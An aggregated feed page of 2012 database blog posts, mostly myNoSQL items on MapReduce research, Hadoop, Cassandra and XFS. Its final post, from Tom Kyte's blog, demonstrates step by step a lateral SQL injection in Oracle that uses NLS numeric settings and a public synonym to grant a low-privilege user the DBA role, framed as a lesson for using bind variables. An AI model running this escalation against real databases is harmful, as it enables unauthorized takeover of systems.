123
 123

Tip: 看不到本站引用 Flickr 的图片? 下载 Firefox Access Flickr 插件 | AD: 订阅 DBA notes --

2012-02-06 Mon

06:46 Research in the MapReduce Space (1941 Bytes) » myNoSQL

Over the weekend I’ve read two papers presenting products or research related to improving or adding new capabilities to the MapReduce data processing approach. The first of them comes from a team at Microsoft and is describing TiMR a time-oriented data processing system in MapReduce. The second, from a team at Google, presents Tenzin - a SQL implementation on the MapReduce framework. It’s great to learn that while the Hadoop community is eliminating some of the initial limitations and hardening the technical details of the platform, there are already ideas and systems out there that augment the capabilities of the MapReduce data processing model.

Original title and link: Research in the MapReduce Space (NoSQL database©myNoSQL)

06:31 Paper: Tenzing A SQL Implementation on the MapReduce Framework (3841 Bytes) » myNoSQL

This recent paper from a team at Google is presenting details about Tenzing a system that is currently in use at Google:

Tenzing is a query engine built on top of MapReduce for ad hoc analysis of Google data. Tenzing supports a mostly complete SQL implementation (with several extensions) combined with several key characteristics such as heterogeneity, high performance, scalability, reliability, metadata awareness, low latency, support for columnar storage and structured data, and easy extensibility.

A couple of things I’ve highlighted when reading it:

  • Tenzing is in production, but doesn’t serve yet a huge amount of queries
  • the backend storage can be a mix of various data stores, such as ColumnIO, Bigtable, GFS files, MySQL databases
  • when compared with other similar solutions (Sawzall, Flume-Java, Pig, Hive„ HadoopDB), Tenzing’s advantage is low latency
  • the paper acknowledges AsterData, GreenPlum, Paraccel, Vertica for using a MapReduce execution model in their engines
  • to perform query optimizations, Tenzing is enhancing queries with information from a metadata server
    • there is no information about what kind of metadata is needed in Tenzing. I assume it might refer to details about the data sources and data source metadata (indexes, access patterns, etc)
  • to reduce query latency, processes are kept running
  • Tenzing supports almost all SQL92 standard and some extensions from SQL99
    • projection and filtering (for some of these and depending on the data source Tenzing can do some optimizations)
    • set operations (implemented in the reduce phase)
    • nested queries and subqueries
    • aggregation and statistical functions
    • analytic functions (syntax similar to PostgreSQL/Oracle)
    • OLAP extensions
    • JOINs:

      Tenzing supports efficient joins across data sources, such as ColumnIO to Bigtable; inner, left, right, cross, and full outer joins; and equi semi-equi, non-equi and function based joins. Cross joins are only supported for tables small enough to fit in memory, and right outer joins are supported only with sort/merge joins. Non-equi correlated subqueries are currently not supported. We include distributed implementations for nested loop, sort/merge and hash joins.

Read and download the “Tenzing A SQL Implementation on the MapReduce framework” after the break.

Original title and link: Paper: Tenzing A SQL Implementation on the MapReduce Framework (NoSQL database©myNoSQL)

06:16 Paper: TiMR is a Time-oriented data processing system in MapReduce (3029 Bytes) » myNoSQL

From the “Temporal Analytics on Big Data for Web Advertising” paper:

TiMR is a framework that transparently combines a map-reduce (M-R) system with a temporal DSMS1. Users express time-oriented analytics using a temporal (DSMS) query lan- guage such as StreamSQL or LINQ. Streaming queries are declarative and easy to write/debug, real-time-ready, and often several orders of magnitude smaller than equivalent custom code for time-oriented applications. TiMR allows the temporal queries to transparently scale on offline temporal data in a cluster by leveraging existing M-R infrastructure.

Broadly speaking, TiMR’s architecture of compiling higher level queries into M-R stages is similar to that of Pig/SCOPE. However, TiMR specializes in time-oriented queries and data, with several new features such as: (1) the use of an unmodified DSMS as part of compilation, parallelization, and execution; and (2) the exploitation of new temporal parallelization opportunities unique to our setting. In addition, we leverage the temporal algebra underlying the DSMS in order to guarantee repeatability across runs in TiMR within M-R (when handling failures), as well as over live data.

According to the paper, DSMS work well for real-time data, but are not massively scalable. On the other hand, Map-Reduce is extremely scalable, but computation is performed on offline data. TiMR proposes a solution that is getting closer to a real-time map-reduce.

Read or download the paper after the break.


  1. Data Stream Management System 

Original title and link: Paper: TiMR is a Time-oriented data processing system in MapReduce (NoSQL database©myNoSQL)

00:35 Hadoop and NoSQL in a Big Data Environment with Ron Bodkin (2310 Bytes) » myNoSQL

Ron Bodkin interviewed by Michael Floyd over InfoQ describes the Hadoop growing addiction:

People are using Hadoop for a variety of analytics. Many of the first uses of Hadoop are complementing traditional data warehouses I just mentioned, where the goal is to take some of the pressure of the data warehouse, start to be able to process less structured data more effectively and to be able to do transformations and build summaries and aggregates, but not have to have all that data loaded to the data warehouse. But then the next thing that happens is once people have started doing that level of processing they realize there is a power of being able to ask questions they never thought of before the data, they can store all the data in small samples and they can go back and have a powerful query engine, a cluster of commodity machines that lets them dig into that raw data and analyze it new ways ultimately leading to data science being able to do machine learning and being able to discover patterns in data and keep them improving and refining the data.

The interview is only 16 minutes long and you have the full transcript.

Original title and link: Hadoop and NoSQL in a Big Data Environment with Ron Bodkin (NoSQL database©myNoSQL)

2012-02-05 Sun

18:14 Cassandra at SocialFlow with Drew Robb - Powered by NoSQL (1618 Bytes) » myNoSQL

To alternate a bit after yesterday’s educational CQL: SQL for Cassandra in the Cassandra NYC 2011 video series from DataStax, today’s video is Drew Robb covering Cassandra usage at SocialFlow for capturing real-time data from Twitter and Bit.ly.

For watching more videos from this event follow the Cassandra NYC 2011 tag.

Original title and link: Cassandra at SocialFlow with Drew Robb - Powered by NoSQL (NoSQL database©myNoSQL)

01:12 XFS: the filesystem of the future? (2128 Bytes) » myNoSQL

Jonathan Corbet summarizing a presentation about the present and future of XFS by Dave Chinner:

XFS is often seen as the filesystem for people with massive amounts of data. It serves that role well, Dave said, and it has traditionally performed well for a lot of workloads. Where things have tended to fall down is in the writing of metadata; support for workloads that generate a lot of metadata writes has been a longstanding weak point for the filesystem. In short, metadata writes were slow, and did not really scale past even a single CPU.

After the break the video of Dave Chinner’s presentation, “XFS: Recent and Future Adventures in Filesystem scalability”.

Even if it’s very long, make sure you check the comment thread.

Jonathan Ellis

Original title and link: XFS: the filesystem of the future? (NoSQL database©myNoSQL)

2012-02-04 Sat

18:14 CQL: SQL for Cassandra with Eric Evans - NoSQL videos (1808 Bytes) » myNoSQL

The fine folks from DataStax have made available the presentations from their Cassandra NYC 2011 event.

The first video to post here is Eric Evans’s presentation on Cassandra Query Language.

For watching more videos from this event follow the Cassandra NYC 2011 tag.

Original title and link: CQL: SQL for Cassandra with Eric Evans - NoSQL videos (NoSQL database©myNoSQL)

2012-02-03 Fri

22:00 All about Security - SQL Injection redux (16959 Bytes) » The Tom Kyte Blog
I just wrote about SQL Injection yesterday - after having giving a web seminar on Wednesday the touched on the topic.

One of the comments on that post was by David Litchfield, he wrote:
Hey Tom,Funnily enough I just published a paper about doing the same thing with NUMBER concatenations. This was an addendum to a paper I wrote in 2008 on exploit DATE concatenations - the same problem you discuss here. You can get the recent paper here: http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers and the first paper here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

I read that new paper and learned something new (actually, much like David - I was kicking myself because I should have been able to see this problem coming as well.  It is just a variation on a theme after all).  In that paper, he demonstrates how to exploit a SQL Injection flaw using NLS settings with numbers.  That is something I hadn't considered before.  NLS settings for numbers are different than for dates.  With a date, I can set the format string to have any string of characters I want.  With numbers - you are very much restricted. On the face of it - it doesn't look like you can exploit a SQL Injection flaw with numbers like you can with dates.

But - you can.  Just not as flexibly.  But the end result can be as disastrous.

One of the follow on comments to this posting by David was:

the problem David mentions in http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers only arises since NUM_PROC is owned by SYS,as far as I can see, correct ? 
So, it's not really a problem since nobody ever does something as SYS, correct.

In his example, David used SYS to demonstrate with - which could lead people to believe "ah, it needs SYS to exploit this flaw".  But - it doesn't.  All it requires is an account with these privileges:
  • Create session
  • Create procedure
  • Create public synonym <<<=== these guys are evil!  Should be avoided
And another schema that has the ability to GRANT stuff - like DBA.  It doesn't have to be DBA, it could be any privilege they have the ability to grant.

Here is how to exploit the flaw.  First - read David's paper to get the background on the 'P ' NLS_NUMERIC_CHARACTERS.  Then you'll understand how:

a%ORA11GR2> select .1 from dual;

        .1
----------
        P1

works.  Once you have mastered that, all we need to do to exploit this type of SQL Injection flaw is this.  I'll have a DBA schema containing a procedure that uses dynamic SQL with string concatenation and a number as an input:

ops$tkyte%ORA11GR2> create or replace procedure do_something( l_num in number )
  2  as
  3      l_query  long;
  4      l_cursor sys_refcursor;
  5      l_rec    all_users%rowtype;
  6  begin
  7      l_query := '
  8       select *
  9         from all_users
 10        where user_id = ' || l_num;
 11      dbms_output.put_line( l_query );
 12  
 13      open l_cursor for l_query;
 14  
 15      loop
 16          fetch l_cursor into l_rec;
 17          exit when l_cursor%notfound;
 18          dbms_output.put_line( 'username = ' || 
                                   l_rec.username );
 19      end loop;
 20      close l_cursor;
 21  end;
 22  /
Procedure created.

Then, we'll have our account with the small set of privileges:


ops$tkyte%ORA11GR2> create user a identified by a;
User created.

ops$tkyte%ORA11GR2> grant create session, create procedure,
                    create public synonym to a;
Grant succeeded.


and we'll allow it to access this procedure - just like in my original SQL Injection article:

ops$tkyte%ORA11GR2> grant execute on do_something to a;
Grant succeeded.

Ok, so now we'll log in as A and run the procedure to see what it does:

ops$tkyte%ORA11GR2> connect a/a
Connected.
a%ORA11GR2> 
a%ORA11GR2> exec ops$tkyte.do_something( 5 );

     select *
       from all_users
      where user_id = 5
username = SYSTEM

PL/SQL procedure successfully completed.


Now, we suspect it might use string concatenation - so we'll create a function that might be able to exploit this:

a%ORA11GR2> create or replace function foobar return number
  2  authid current_user
  3  as
  4      pragma autonomous_transaction;
  5  begin
  6      execute immediate 'grant dba to a';
  7      return 5;
  8  end;
  9  /
Function created.

And then set up our public synonym for it and allow others to execute it:

a%ORA11GR2> create public synonym p1 for foobar;
Synonym created.

a%ORA11GR2> grant execute on foobar to public;
Grant succeeded.


and now for the magic:

a%ORA11GR2> alter session set nls_numeric_characters = 'P ';
Session altered.

and viola:

a%ORA11GR2> set role dba;
set role dba
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist


a%ORA11GR2> exec ops$tkyte.do_something( .1 );

     select *
       from all_users
      where user_id = P1
username = SYSTEM

PL/SQL procedure successfully completed.

a%ORA11GR2> set role dba;

Role set.


I have DBA...

SQL Injection is insidious.  SQL Injection is hard to detect.  SQL Injection can be avoided - by simply using bind variables.  In the event a bind variable is not possible for some provable technical reason (and those events are few and far far far in between) you have to critically review that code over and over and try to think of every way it could be exploited.  The problem with that however is that before yesterday - I would have looked at this code and might have said "this looks ok".  

It is really hard to protect yourself from something you cannot see.



Updated a little later: Let me also say this:

If you use static sql in plsql - your code in plsql cannot be sql injected, period.  It is not possible.  The only way to get sql injected in plsql is to use dynamic sql - that is the only time.  So, if you want maximum protection from SQL Injection - if you just want to avoid it, you will:

a) write your SQL code in PL/SQL
b) call this PL/SQL from your java/c/c#/whatever code USING BINDS to pass all inputs and outputs to/from the database

If you do that - no SQL Injection attacks are possible.